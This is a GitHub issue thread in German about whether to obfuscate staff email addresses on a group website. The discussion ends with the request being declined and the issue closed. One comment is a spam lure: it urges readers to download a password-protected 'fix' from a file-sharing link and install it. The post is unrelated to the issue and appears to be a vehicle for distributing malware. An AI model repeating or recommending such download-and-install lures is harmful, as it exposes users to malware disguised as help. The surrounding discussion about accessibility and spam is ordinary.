### ISSUE TITLE
Obfuscation of email adresses

### ISSUE THREAD

**Issue by waidschrat** [PHB-Methods/phb-methoden-website#3]
Liebe Esther,

in Ermangelung einer eigenen PHB Webseite unserer neuen KollegInnen, habe ich deren PHB Emails direkt eingetragen. Dabei fiel mir allerdings ein, wie der letzter mir bekannte Versuch an der TUD endete - mit Unmengen an Spam, weil die Adressen durch Bots automatisch ausgelesen wurden.

Könntest Du evtl. folgendes Rezept implementieren, um die Adressen zu verbergen?
https://stackoverflow.com/questions/41318987/hide-email-address-from-bots-keep-mailto

Dickes Dankeschön :)

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by selfawaresoup** [comment]
Ich bezweifle sehr, dass das den gewünschten Effekt haben wird, vor allem da diese zwei Anforderungen sich gegenseitig ausschließen:

- lesen der Email-Adresse durch Bots verhindern
- Screen-Reader-Unterstützung und `mailto:`-Funktion behalten

Screen-Reader, Webbrowser und Email-Clients sind letztendlich "Bots", die die Seite lesen können müssen.

Auf <https://www.phb.de> sind auch alle Email-Adressen im Klartext hinterlegt. Ich sehe keinen Grund es hier anders zu machen. Ich selbst habe meine private und geschäftliche Email seit vielen Jahren auf meinen eigenen Websites stehen ohne Obfuscation und keine nennenswerten Probleme mit Spam.

Auch in meiner früheren Arbeit als Web-Entwicklerin war solche Obfuscation nie ein ernsthaftes Thema. Das ist meiner Meinung nach eher etwas, was nur echten Besucher*innen der Seite das Leben schwerer macht und gegen Spam nicht wirklich etwas bringt.

**Comment by selfawaresoup** [comment]
@waidschrat kann dieses Ticket geschlossen werden?

**Comment by waidschrat** [comment]
Jop, dank Dir! Closed
